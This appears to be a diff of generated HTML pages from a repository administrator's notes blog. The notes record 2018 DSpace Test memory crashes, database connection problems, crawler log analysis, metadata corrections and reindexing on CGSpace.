<pre tabindex="0"><code>2018-03-21 15:11:08,166 ERROR org.dspace.storage.rdbms.DatabaseManager @ SQL QueryTable Error -
java.sql.SQLException: Connection has already been closed.
</code></pre><ul>
<li>I have no idea why so many connections were abandoned this afternoon:</li>
</ul>
<pre><code># grep 'Mar 21, 2018' /var/log/tomcat7/catalina.out | grep -c 'org.apache.tomcat.jdbc.pool.ConnectionPool abandon'
<pre tabindex="0"><code># grep &#39;Mar 21, 2018&#39; /var/log/tomcat7/catalina.out | grep -c &#39;org.apache.tomcat.jdbc.pool.ConnectionPool abandon&#39;
268
</code></pre><ul>
<li>DSpace Test crashed again due to Java heap space, this is from the DSpace log:</li>
</ul>
<pre><code>2018-03-21 15:18:48,149 ERROR org.dspace.app.xmlui.cocoon.DSpaceCocoonServletFilter @ Serious Error Occurred Processing Request!
<pre tabindex="0"><code>2018-03-21 15:18:48,149 ERROR org.dspace.app.xmlui.cocoon.DSpaceCocoonServletFilter @ Serious Error Occurred Processing Request!
org.springframework.web.util.NestedServletException: Handler processing failed; nested exception is java.lang.OutOfMemoryError: Java heap space
</code></pre><ul>
<li>And this is from the Tomcat Catalina log:</li>
</ul>
<pre><code>Mar 21, 2018 11:20:00 AM org.apache.catalina.core.ContainerBase$ContainerBackgroundProcessor run
<pre tabindex="0"><code>Mar 21, 2018 11:20:00 AM org.apache.catalina.core.ContainerBase$ContainerBackgroundProcessor run
SEVERE: Unexpected death of background thread ContainerBackgroundProcessor[StandardEngine[Catalina]]
java.lang.OutOfMemoryError: Java heap space
</code></pre><ul>
<li>But there are tons of heap space errors on DSpace Test actually:</li>
</ul>
<pre><code># grep -c 'java.lang.OutOfMemoryError: Java heap space' /var/log/tomcat7/catalina.out
<pre tabindex="0"><code># grep -c &#39;java.lang.OutOfMemoryError: Java heap space&#39; /var/log/tomcat7/catalina.out
319
</code></pre><ul>
<li>I guess we need to give it more RAM because it now has CGSpace&rsquo;s large Solr core</li>
@ -457,7 +457,7 @@ java.lang.OutOfMemoryError: Java heap space
<li>Deploy the new JDBC driver on DSpace Test</li>
<li>I&rsquo;m also curious to see how long the <code>dspace index-discovery -b</code> takes on DSpace Test where the DSpace installation directory is on one of Linode&rsquo;s new block storage volumes</li>
</ul>
<pre><code>$ time schedtool -D -e ionice -c2 -n7 nice -n19 dspace index-discovery -b
<pre tabindex="0"><code>$ time schedtool -D -e ionice -c2 -n7 nice -n19 dspace index-discovery -b
real 208m19.155s
user 8m39.138s
@ -470,7 +470,7 @@ sys 2m45.135s
<li>For example, Peter has inadvertantly introduced Unicode character 0xfffd into several fields</li>
<li>I can search for Unicode values by their hex code in OpenRefine using the following GREL expression:</li>
</ul>
<pre><code>isNotNull(value.match(/.*\ufffd.*/))
<pre tabindex="0"><code>isNotNull(value.match(/.*\ufffd.*/))
</code></pre><ul>
<li>I need to be able to add many common characters though so that it is useful to copy and paste into a new project to find issues</li>
</ul>
@ -489,11 +489,11 @@ sys 2m45.135s
<li>Looking at Peter&rsquo;s author corrections and trying to work out a way to find errors in OpenRefine easily</li>
<li>I can find all names that have acceptable characters using a GREL expression like:</li>
</ul>
<pre><code>isNotNull(value.match(/.*[a-zA-ZáÁéèïíñØøöóúü].*/))
<pre tabindex="0"><code>isNotNull(value.match(/.*[a-zA-ZáÁéèïíñØøöóúü].*/))
</code></pre><ul>
<li>But it&rsquo;s probably better to just say which characters I know for sure are not valid (like parentheses, pipe, or weird Unicode characters):</li>
</ul>
<pre><code>or(
<pre tabindex="0"><code>or(
isNotNull(value.match(/.*[(|)].*/)),
isNotNull(value.match(/.*\uFFFD.*/)),
isNotNull(value.match(/.*\u00A0.*/)),
@ -502,7 +502,7 @@ sys 2m45.135s
</code></pre><ul>
<li>And here&rsquo;s one combined GREL expression to check for items marked as to delete or check so I can flag them and export them to a separate CSV (though perhaps it&rsquo;s time to add delete support to my <code>fix-metadata-values.py</code> script:</li>
</ul>
<pre><code>or(
<pre tabindex="0"><code>or(
isNotNull(value.match(/.*delete.*/i)),
isNotNull(value.match(/.*remove.*/i)),
isNotNull(value.match(/.*check.*/i))
@ -521,8 +521,8 @@ sys 2m45.135s
<p>Test the corrections and deletions locally, then run them on CGSpace:</p>
</li>
</ul>
<pre><code>$ ./fix-metadata-values.py -i /tmp/Correct-2928-Authors-2018-03-21.csv -db dspace -u dspace -p 'fuuu' -f dc.contributor.author -t correct -m 3
$ ./delete-metadata-values.py -i /tmp/Delete-8-Authors-2018-03-21.csv -f dc.contributor.author -m 3 -db dspacetest -u dspace -p 'fuuu'
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/Correct-2928-Authors-2018-03-21.csv -db dspace -u dspace -p &#39;fuuu&#39; -f dc.contributor.author -t correct -m 3
$ ./delete-metadata-values.py -i /tmp/Delete-8-Authors-2018-03-21.csv -f dc.contributor.author -m 3 -db dspacetest -u dspace -p &#39;fuuu&#39;
</code></pre><ul>
<li>Afterwards I started a full Discovery reindexing on both CGSpace and DSpace Test</li>
<li>CGSpace took 76m28.292s</li>
@ -542,12 +542,12 @@ $ ./delete-metadata-values.py -i /tmp/Delete-8-Authors-2018-03-21.csv -f dc.cont
<li>DSpace Test crashed due to heap space so I&rsquo;ve increased it from 4096m to 5120m</li>
<li>The error in Tomcat&rsquo;s <code>catalina.out</code> was:</li>
</ul>
<pre><code>Exception in thread &quot;RMI TCP Connection(idle)&quot; java.lang.OutOfMemoryError: Java heap space
<pre tabindex="0"><code>Exception in thread &#34;RMI TCP Connection(idle)&#34; java.lang.OutOfMemoryError: Java heap space
</code></pre><ul>
<li>Add ISI Journal (cg.isijournal) as an option in Atmire&rsquo;s Listing and Reports layout (<a href="https://github.com/ilri/DSpace/pull/370">#370</a>) for Abenet</li>
<li>I noticed a few hundred CRPs using the old capitalized formatting so I corrected them:</li>
</ul>
<pre><code>$ ./fix-metadata-values.py -i /tmp/Correct-21-CRPs-2018-03-16.csv -f cg.contributor.crp -t correct -m 230 -db cgspace -u cgspace -p 'fuuu'
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/Correct-21-CRPs-2018-03-16.csv -f cg.contributor.crp -t correct -m 230 -db cgspace -u cgspace -p &#39;fuuu&#39;
Fixed 29 occurences of: CLIMATE CHANGE, AGRICULTURE AND FOOD SECURITY
Fixed 7 occurences of: WATER, LAND AND ECOSYSTEMS
Fixed 19 occurences of: AGRICULTURE FOR NUTRITION AND HEALTH
@ -585,15 +585,15 @@ Fixed 5 occurences of: GENEBANKS
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2021-08/">August, 2021</a></li>
<li><a href="/cgspace-notes/2025-01/">January, 2025</a></li>
<li><a href="/cgspace-notes/2021-07/">July, 2021</a></li>
<li><a href="/cgspace-notes/2024-12/">December, 2024</a></li>
<li><a href="/cgspace-notes/2021-06/">June, 2021</a></li>
<li><a href="/cgspace-notes/2024-11/">November, 2024</a></li>
<li><a href="/cgspace-notes/2021-05/">May, 2021</a></li>
<li><a href="/cgspace-notes/2024-10/">October, 2024</a></li>
<li><a href="/cgspace-notes/2021-04/">April, 2021</a></li>
<li><a href="/cgspace-notes/2024-09/">September, 2024</a></li>
</ol>
</section>

View File

@ -26,7 +26,7 @@ Catalina logs at least show some memory errors yesterday:
I tried to test something on DSpace Test but noticed that it&rsquo;s down since god knows when
Catalina logs at least show some memory errors yesterday:
"/>
<meta name="generator" content="Hugo 0.87.0" />
<meta name="generator" content="Hugo 0.133.1">
@ -56,12 +56,12 @@ Catalina logs at least show some memory errors yesterday:
<!-- combined, minified CSS -->
<link href="https://alanorth.github.io/cgspace-notes/css/style.beb8012edc08ba10be012f079d618dc243812267efe62e11f22fe49618f976a4.css" rel="stylesheet" integrity="sha256-vrgBLtwIuhC&#43;AS8HnWGNwkOBImfv5i4R8i/klhj5dqQ=" crossorigin="anonymous">
<link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
<!-- minified Font Awesome for SVG icons -->
<script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.ffbfea088a9a1666ec65c3a8cb4906e2a0e4f92dc70dbbf400a125ad2422123a.js" integrity="sha256-/7/qCIqaFmbsZcOoy0kG4qDk&#43;S3HDbv0AKElrSQiEjo=" crossorigin="anonymous"></script>
<script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
<!-- RSS 2.0 feed -->
@ -107,7 +107,7 @@ Catalina logs at least show some memory errors yesterday:
<p class="blog-post-meta">
<time datetime="2018-04-01T16:13:54+02:00">Sun Apr 01, 2018</time>
in
<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/cgspace-notes/categories/notes/" rel="category tag">Notes</a>
<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
</p>
@ -117,11 +117,11 @@ Catalina logs at least show some memory errors yesterday:
<li>I tried to test something on DSpace Test but noticed that it&rsquo;s down since god knows when</li>
<li>Catalina logs at least show some memory errors yesterday:</li>
</ul>
<pre><code>Mar 31, 2018 10:26:42 PM org.apache.catalina.core.ContainerBase$ContainerBackgroundProcessor run
<pre tabindex="0"><code>Mar 31, 2018 10:26:42 PM org.apache.catalina.core.ContainerBase$ContainerBackgroundProcessor run
SEVERE: Unexpected death of background thread ContainerBackgroundProcessor[StandardEngine[Catalina]]
java.lang.OutOfMemoryError: Java heap space
Exception in thread &quot;ContainerBackgroundProcessor[StandardEngine[Catalina]]&quot; java.lang.OutOfMemoryError: Java heap space
Exception in thread &#34;ContainerBackgroundProcessor[StandardEngine[Catalina]]&#34; java.lang.OutOfMemoryError: Java heap space
</code></pre><ul>
<li>So this is getting super annoying</li>
<li>I ran all system updates on DSpace Test and rebooted it</li>
@ -134,12 +134,12 @@ Exception in thread &quot;ContainerBackgroundProcessor[StandardEngine[Catalina]]
<li>Peter noticed that there were still some old CRP names on CGSpace, because I hadn&rsquo;t forced the Discovery index to be updated after I fixed the others last week</li>
<li>For completeness I re-ran the CRP corrections on CGSpace:</li>
</ul>
<pre><code>$ ./fix-metadata-values.py -i /tmp/Correct-21-CRPs-2018-03-16.csv -f cg.contributor.crp -t correct -m 230 -db dspace -u dspace -p 'fuuu'
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/Correct-21-CRPs-2018-03-16.csv -f cg.contributor.crp -t correct -m 230 -db dspace -u dspace -p &#39;fuuu&#39;
Fixed 1 occurences of: AGRICULTURE FOR NUTRITION AND HEALTH
</code></pre><ul>
<li>Then started a full Discovery index:</li>
</ul>
<pre><code>$ export JAVA_OPTS='-Dfile.encoding=UTF-8 -Xmx1024m'
<pre tabindex="0"><code>$ export JAVA_OPTS=&#39;-Dfile.encoding=UTF-8 -Xmx1024m&#39;
$ time schedtool -D -e ionice -c2 -n7 nice -n19 dspace index-discovery -b
real 76m13.841s
@ -149,18 +149,18 @@ sys 2m2.498s
<li>Elizabeth from CIAT emailed to ask if I could help her by adding ORCID identifiers to all of Joseph Tohme&rsquo;s items</li>
<li>I used my <a href="https://gist.githubusercontent.com/alanorth/a49d85cd9c5dea89cddbe809813a7050/raw/f67b6e45a9a940732882ae4bb26897a9b245ef31/add-orcid-identifiers-csv.py">add-orcid-identifiers-csv.py</a> script:</li>
</ul>
<pre><code>$ ./add-orcid-identifiers-csv.py -i /tmp/jtohme-2018-04-04.csv -db dspace -u dspace -p 'fuuu'
<pre tabindex="0"><code>$ ./add-orcid-identifiers-csv.py -i /tmp/jtohme-2018-04-04.csv -db dspace -u dspace -p &#39;fuuu&#39;
</code></pre><ul>
<li>The CSV format of <code>jtohme-2018-04-04.csv</code> was:</li>
</ul>
<pre><code class="language-csv" data-lang="csv">dc.contributor.author,cg.creator.id
&quot;Tohme, Joseph M.&quot;,Joe Tohme: 0000-0003-2765-7101
<pre tabindex="0"><code class="language-csv" data-lang="csv">dc.contributor.author,cg.creator.id
&#34;Tohme, Joseph M.&#34;,Joe Tohme: 0000-0003-2765-7101
</code></pre><ul>
<li>There was a quoting error in my CRP CSV and the replacements for <code>Forests, Trees and Agroforestry</code> got messed up</li>
<li>So I fixed them and had to re-index again!</li>
<li>I started preparing the git branch for the the DSpace 5.5→5.8 upgrade:</li>
</ul>
<pre><code>$ git checkout -b 5_x-dspace-5.8 5_x-prod
<pre tabindex="0"><code>$ git checkout -b 5_x-dspace-5.8 5_x-prod
$ git reset --hard ilri/5_x-prod
$ git rebase -i dspace-5.8
</code></pre><ul>
@ -181,7 +181,7 @@ $ git rebase -i dspace-5.8
<li>Fix Sisay&rsquo;s sudo access on the new DSpace Test server (linode19)</li>
<li>The reindexing process on DSpace Test took <em>forever</em> yesterday:</li>
</ul>
<pre><code>$ time schedtool -D -e ionice -c2 -n7 nice -n19 dspace index-discovery -b
<pre tabindex="0"><code>$ time schedtool -D -e ionice -c2 -n7 nice -n19 dspace index-discovery -b
real 599m32.961s
user 9m3.947s
@ -193,7 +193,7 @@ sys 2m52.585s
<li>Help Peter with the GDPR compliance / reporting form for CGSpace</li>
<li>DSpace Test crashed due to memory issues again:</li>
</ul>
<pre><code># grep -c 'java.lang.OutOfMemoryError: Java heap space' /var/log/tomcat7/catalina.out
<pre tabindex="0"><code># grep -c &#39;java.lang.OutOfMemoryError: Java heap space&#39; /var/log/tomcat7/catalina.out
16
</code></pre><ul>
<li>I ran all system updates on DSpace Test and rebooted it</li>
@ -205,7 +205,7 @@ sys 2m52.585s
<li>I got a notice that CGSpace CPU usage was very high this morning</li>
<li>Looking at the nginx logs, here are the top users today so far:</li>
</ul>
<pre><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;10/Apr/2018&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;10/Apr/2018&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
282 207.46.13.112
286 54.175.208.220
287 207.46.13.113
@ -220,24 +220,24 @@ sys 2m52.585s
<li>45.5.186.2 is of course CIAT</li>
<li>95.108.181.88 appears to be Yandex:</li>
</ul>
<pre><code>95.108.181.88 - - [09/Apr/2018:06:34:16 +0000] &quot;GET /bitstream/handle/10568/21794/ILRI_logo_usage.jpg.jpg HTTP/1.1&quot; 200 2638 &quot;-&quot; &quot;Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)&quot;
<pre tabindex="0"><code>95.108.181.88 - - [09/Apr/2018:06:34:16 +0000] &#34;GET /bitstream/handle/10568/21794/ILRI_logo_usage.jpg.jpg HTTP/1.1&#34; 200 2638 &#34;-&#34; &#34;Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)&#34;
</code></pre><ul>
<li>And for some reason Yandex created a lot of Tomcat sessions today:</li>
</ul>
<pre><code>$ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=95.108.181.88' dspace.log.2018-04-10
<pre tabindex="0"><code>$ grep -c -E &#39;session_id=[A-Z0-9]{32}:ip_addr=95.108.181.88&#39; dspace.log.2018-04-10
4363
</code></pre><ul>
<li>70.32.83.92 appears to be some harvester we&rsquo;ve seen before, but on a new IP</li>
<li>They are not creating new Tomcat sessions so there is no problem there</li>
<li>178.154.200.38 also appears to be Yandex, and is also creating many Tomcat sessions:</li>
</ul>
<pre><code>$ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=178.154.200.38' dspace.log.2018-04-10
<pre tabindex="0"><code>$ grep -c -E &#39;session_id=[A-Z0-9]{32}:ip_addr=178.154.200.38&#39; dspace.log.2018-04-10
3982
</code></pre><ul>
<li>I&rsquo;m not sure why Yandex creates so many Tomcat sessions, as its user agent should match the Crawler Session Manager valve</li>
<li>Let&rsquo;s try a manual request with and without their user agent:</li>
</ul>
<pre><code>$ http --print Hh https://cgspace.cgiar.org/bitstream/handle/10568/21794/ILRI_logo_usage.jpg.jpg 'User-Agent:Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'
<pre tabindex="0"><code>$ http --print Hh https://cgspace.cgiar.org/bitstream/handle/10568/21794/ILRI_logo_usage.jpg.jpg &#39;User-Agent:Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)&#39;
GET /bitstream/handle/10568/21794/ILRI_logo_usage.jpg.jpg HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
@ -294,7 +294,7 @@ X-XSS-Protection: 1; mode=block
<ul>
<li>In other news, it looks like the number of total requests processed by nginx in March went down from the previous months:</li>
</ul>
<pre><code># time zcat --force /var/log/nginx/* | grep -cE &quot;[0-9]{1,2}/Mar/2018&quot;
<pre tabindex="0"><code># time zcat --force /var/log/nginx/* | grep -cE &#34;[0-9]{1,2}/Mar/2018&#34;
2266594
real 0m13.658s
@ -303,25 +303,25 @@ sys 0m1.087s
</code></pre><ul>
<li>In other other news, the database cleanup script has an issue again:</li>
</ul>
<pre><code>$ dspace cleanup -v
<pre tabindex="0"><code>$ dspace cleanup -v
...
Error: ERROR: update or delete on table &quot;bitstream&quot; violates foreign key constraint &quot;bundle_primary_bitstream_id_fkey&quot; on table &quot;bundle&quot;
Detail: Key (bitstream_id)=(151626) is still referenced from table &quot;bundle&quot;.
Error: ERROR: update or delete on table &#34;bitstream&#34; violates foreign key constraint &#34;bundle_primary_bitstream_id_fkey&#34; on table &#34;bundle&#34;
Detail: Key (bitstream_id)=(151626) is still referenced from table &#34;bundle&#34;.
</code></pre><ul>
<li>The solution is, as always:</li>
</ul>
<pre><code>$ psql dspace -c 'update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (151626);'
<pre tabindex="0"><code>$ psql dspace -c &#39;update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (151626);&#39;
UPDATE 1
</code></pre><ul>
<li>Looking at abandoned connections in Tomcat:</li>
</ul>
<pre><code># zcat /var/log/tomcat7/catalina.out.[1-9].gz | grep -c 'org.apache.tomcat.jdbc.pool.ConnectionPool abandon'
<pre tabindex="0"><code># zcat /var/log/tomcat7/catalina.out.[1-9].gz | grep -c &#39;org.apache.tomcat.jdbc.pool.ConnectionPool abandon&#39;
2115
</code></pre><ul>
<li>Apparently from these stacktraces we should be able to see which code is not closing connections properly</li>
<li>Here&rsquo;s a pretty good overview of days where we had database issues recently:</li>
</ul>
<pre><code># zcat /var/log/tomcat7/catalina.out.[1-9].gz | grep 'org.apache.tomcat.jdbc.pool.ConnectionPool abandon' | awk '{print $1,$2, $3}' | sort | uniq -c | sort -n
<pre tabindex="0"><code># zcat /var/log/tomcat7/catalina.out.[1-9].gz | grep &#39;org.apache.tomcat.jdbc.pool.ConnectionPool abandon&#39; | awk &#39;{print $1,$2, $3}&#39; | sort | uniq -c | sort -n
1 Feb 18, 2018
1 Feb 19, 2018
1 Feb 20, 2018
@ -356,7 +356,7 @@ UPDATE 1
<ul>
<li>DSpace Test (linode19) crashed again some time since yesterday:</li>
</ul>
<pre><code># grep -c 'java.lang.OutOfMemoryError: Java heap space' /var/log/tomcat7/catalina.out
<pre tabindex="0"><code># grep -c &#39;java.lang.OutOfMemoryError: Java heap space&#39; /var/log/tomcat7/catalina.out
168
</code></pre><ul>
<li>I ran all system updates and rebooted the server</li>
@ -374,12 +374,12 @@ UPDATE 1
<ul>
<li>While testing an XMLUI patch for <a href="https://jira.duraspace.org/browse/DS-3883">DS-3883</a> I noticed that there is still some remaining Authority / Solr configuration left that we need to remove:</li>
</ul>
<pre><code>2018-04-14 18:55:25,841 ERROR org.dspace.authority.AuthoritySolrServiceImpl @ Authority solr is not correctly configured, check &quot;solr.authority.server&quot; property in the dspace.cfg
<pre tabindex="0"><code>2018-04-14 18:55:25,841 ERROR org.dspace.authority.AuthoritySolrServiceImpl @ Authority solr is not correctly configured, check &#34;solr.authority.server&#34; property in the dspace.cfg
java.lang.NullPointerException
</code></pre><ul>
<li>I assume we need to remove <code>authority</code> from the consumers in <code>dspace/config/dspace.cfg</code>:</li>
</ul>
<pre><code>event.dispatcher.default.consumers = authority, versioning, discovery, eperson, harvester, statistics,batchedit, versioningmqm
<pre tabindex="0"><code>event.dispatcher.default.consumers = authority, versioning, discovery, eperson, harvester, statistics,batchedit, versioningmqm
</code></pre><ul>
<li>I see the same error on DSpace Test so this is definitely a problem</li>
<li>After disabling the authority consumer I no longer see the error</li>
@ -387,7 +387,7 @@ java.lang.NullPointerException
<li>File a ticket on DSpace&rsquo;s Jira for the <code>target=&quot;_blank&quot;</code> security and performance issue (<a href="https://jira.duraspace.org/browse/DS-3891">DS-3891</a>)</li>
<li>I re-deployed DSpace Test (linode19) and was surprised by how long it took the ant update to complete:</li>
</ul>
<pre><code>BUILD SUCCESSFUL
<pre tabindex="0"><code>BUILD SUCCESSFUL
Total time: 4 minutes 12 seconds
</code></pre><ul>
<li>The Linode block storage is much slower than the instance storage</li>
@ -404,7 +404,7 @@ Total time: 4 minutes 12 seconds
<li>They will need to use OpenSearch, but I can&rsquo;t remember all the parameters</li>
<li>Apparently search sort options for OpenSearch are in <code>dspace.cfg</code>:</li>
</ul>
<pre><code>webui.itemlist.sort-option.1 = title:dc.title:title
<pre tabindex="0"><code>webui.itemlist.sort-option.1 = title:dc.title:title
webui.itemlist.sort-option.2 = dateissued:dc.date.issued:date
webui.itemlist.sort-option.3 = dateaccessioned:dc.date.accessioned:date
webui.itemlist.sort-option.4 = type:dc.type:text
@ -422,27 +422,27 @@ webui.itemlist.sort-option.4 = type:dc.type:text
<li>They are missing the <code>order</code> parameter (ASC vs DESC)</li>
<li>I notice that DSpace Test has crashed again, due to memory:</li>
</ul>
<pre><code># grep -c 'java.lang.OutOfMemoryError: Java heap space' /var/log/tomcat7/catalina.out
<pre tabindex="0"><code># grep -c &#39;java.lang.OutOfMemoryError: Java heap space&#39; /var/log/tomcat7/catalina.out
178
</code></pre><ul>
<li>I will increase the JVM heap size from 5120M to 6144M, though we don&rsquo;t have much room left to grow as DSpace Test (linode19) is using a smaller instance size than CGSpace</li>
<li>Gabriela from CIP asked if I could send her a list of all CIP authors so she can do some replacements on the name formats</li>
<li>I got a list of all the CIP collections manually and use the same query that I used in <a href="/cgspace-notes/2017-08">August, 2017</a>:</li>
</ul>
<pre><code>dspace#= \copy (select distinct text_value, count(*) from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'contributor' and qualifier = 'author') AND resource_type_id = 2 AND resource_id IN (select item_id from collection2item where collection_id IN (select resource_id from handle where handle in ('10568/89347', '10568/88229', '10568/53086', '10568/53085', '10568/69069', '10568/53087', '10568/53088', '10568/53089', '10568/53090', '10568/53091', '10568/53092', '10568/70150', '10568/53093', '10568/64874', '10568/53094'))) group by text_value order by count desc) to /tmp/cip-authors.csv with csv;
<pre tabindex="0"><code>dspace#= \copy (select distinct text_value, count(*) from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = &#39;contributor&#39; and qualifier = &#39;author&#39;) AND resource_type_id = 2 AND resource_id IN (select item_id from collection2item where collection_id IN (select resource_id from handle where handle in (&#39;10568/89347&#39;, &#39;10568/88229&#39;, &#39;10568/53086&#39;, &#39;10568/53085&#39;, &#39;10568/69069&#39;, &#39;10568/53087&#39;, &#39;10568/53088&#39;, &#39;10568/53089&#39;, &#39;10568/53090&#39;, &#39;10568/53091&#39;, &#39;10568/53092&#39;, &#39;10568/70150&#39;, &#39;10568/53093&#39;, &#39;10568/64874&#39;, &#39;10568/53094&#39;))) group by text_value order by count desc) to /tmp/cip-authors.csv with csv;
</code></pre><h2 id="2018-04-19">2018-04-19</h2>
<ul>
<li>Run updates on DSpace Test (linode19) and reboot the server</li>
<li>Also try deploying updated GeoLite database during ant update while re-deploying code:</li>
</ul>
<pre><code>$ ant update update_geolite clean_backups
<pre tabindex="0"><code>$ ant update update_geolite clean_backups
</code></pre><ul>
<li>I also re-deployed CGSpace (linode18) to make the ORCID search, authority cleanup, CCAFS project tag <code>PII-LAM_CSAGender</code> live</li>
<li>When re-deploying I also updated the GeoLite databases so I hope the country stats become more accurate&hellip;</li>
<li>After re-deployment I ran all system updates on the server and rebooted it</li>
<li>After the reboot I forced a reïndexing of the Discovery to populate the new ORCID index:</li>
</ul>
<pre><code>$ time schedtool -D -e ionice -c2 -n7 nice -n19 dspace index-discovery -b
<pre tabindex="0"><code>$ time schedtool -D -e ionice -c2 -n7 nice -n19 dspace index-discovery -b
real 73m42.635s
user 8m15.885s
@ -456,21 +456,21 @@ sys 2m2.687s
<li>I confirm that it&rsquo;s just giving a white page around 4:16</li>
<li>The DSpace logs show that there are no database connections:</li>
</ul>
<pre><code>org.apache.tomcat.jdbc.pool.PoolExhaustedException: [http-bio-127.0.0.1-8443-exec-715] Timeout: Pool empty. Unable to fetch a connection in 5 seconds, none available[size:250; busy:18; idle:0; lastwait:5000].
<pre tabindex="0"><code>org.apache.tomcat.jdbc.pool.PoolExhaustedException: [http-bio-127.0.0.1-8443-exec-715] Timeout: Pool empty. Unable to fetch a connection in 5 seconds, none available[size:250; busy:18; idle:0; lastwait:5000].
</code></pre><ul>
<li>And there have been shit tons of errors in the last (starting only 20 minutes ago luckily):</li>
</ul>
<pre><code># grep -c 'org.apache.tomcat.jdbc.pool.PoolExhaustedException' /home/cgspace.cgiar.org/log/dspace.log.2018-04-20
<pre tabindex="0"><code># grep -c &#39;org.apache.tomcat.jdbc.pool.PoolExhaustedException&#39; /home/cgspace.cgiar.org/log/dspace.log.2018-04-20
32147
</code></pre><ul>
<li>I can&rsquo;t even log into PostgreSQL as the <code>postgres</code> user, WTF?</li>
</ul>
<pre><code>$ psql -c 'select * from pg_stat_activity' | grep -o -E '(dspaceWeb|dspaceApi|dspaceCli)' | sort | uniq -c
<pre tabindex="0"><code>$ psql -c &#39;select * from pg_stat_activity&#39; | grep -o -E &#39;(dspaceWeb|dspaceApi|dspaceCli)&#39; | sort | uniq -c
^C
</code></pre><ul>
<li>Here are the most active IPs today:</li>
</ul>
<pre><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;20/Apr/2018&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;20/Apr/2018&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
917 207.46.13.182
935 213.55.99.121
970 40.77.167.134
@ -484,11 +484,11 @@ sys 2m2.687s
</code></pre><ul>
<li>It doesn&rsquo;t even seem like there is a lot of traffic compared to the previous days:</li>
</ul>
<pre><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;20/Apr/2018&quot; | wc -l
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;20/Apr/2018&#34; | wc -l
74931
# zcat --force /var/log/nginx/*.log.1 /var/log/nginx/*.log.2.gz| grep -E &quot;19/Apr/2018&quot; | wc -l
# zcat --force /var/log/nginx/*.log.1 /var/log/nginx/*.log.2.gz| grep -E &#34;19/Apr/2018&#34; | wc -l
91073
# zcat --force /var/log/nginx/*.log.2.gz /var/log/nginx/*.log.3.gz| grep -E &quot;18/Apr/2018&quot; | wc -l
# zcat --force /var/log/nginx/*.log.2.gz /var/log/nginx/*.log.3.gz| grep -E &#34;18/Apr/2018&#34; | wc -l
93459
</code></pre><ul>
<li>I tried to restart Tomcat but <code>systemctl</code> hangs</li>
@ -499,7 +499,7 @@ sys 2m2.687s
<li>Everything is back but I have no idea what caused this—I suspect something with the hosting provider</li>
<li>Also super weird, the last entry in the DSpace log file is from <code>2018-04-20 16:35:09</code>, and then immediately it goes to <code>2018-04-20 19:15:04</code> (three hours later!):</li>
</ul>
<pre><code>2018-04-20 16:35:09,144 ERROR org.dspace.app.util.AbstractDSpaceWebapp @ Failed to record shutdown in Webapp table.
<pre tabindex="0"><code>2018-04-20 16:35:09,144 ERROR org.dspace.app.util.AbstractDSpaceWebapp @ Failed to record shutdown in Webapp table.
org.apache.tomcat.jdbc.pool.PoolExhaustedException: [localhost-startStop-2] Timeout: Pool empty. Unable to fetch a connection in 5 seconds, none available[size:250; busy:18; idle
:0; lastwait:5000].
at org.apache.tomcat.jdbc.pool.ConnectionPool.borrowConnection(ConnectionPool.java:685)
@ -543,12 +543,12 @@ org.apache.tomcat.jdbc.pool.PoolExhaustedException: [localhost-startStop-2] Time
<li>One other new thing I notice is that PostgreSQL 9.6 no longer uses <code>createuser</code> and <code>nocreateuser</code>, as those have actually meant <code>superuser</code> and <code>nosuperuser</code> and have been deprecated for <em>ten years</em></li>
<li>So for my notes, when I&rsquo;m importing a CGSpace database dump I need to amend my notes to give super user permission to a user, rather than create user:</li>
</ul>
<pre><code>$ psql dspacetest -c 'alter user dspacetest superuser;'
<pre tabindex="0"><code>$ psql dspacetest -c &#39;alter user dspacetest superuser;&#39;
$ pg_restore -O -U dspacetest -d dspacetest -W -h localhost /tmp/dspace_2018-04-18.backup
</code></pre><ul>
<li>There&rsquo;s another issue with Tomcat in Ubuntu 18.04:</li>
</ul>
<pre><code>25-Apr-2018 13:26:21.493 SEVERE [http-nio-127.0.0.1-8443-exec-1] org.apache.coyote.AbstractProtocol$ConnectionHandler.process Error reading request, ignored
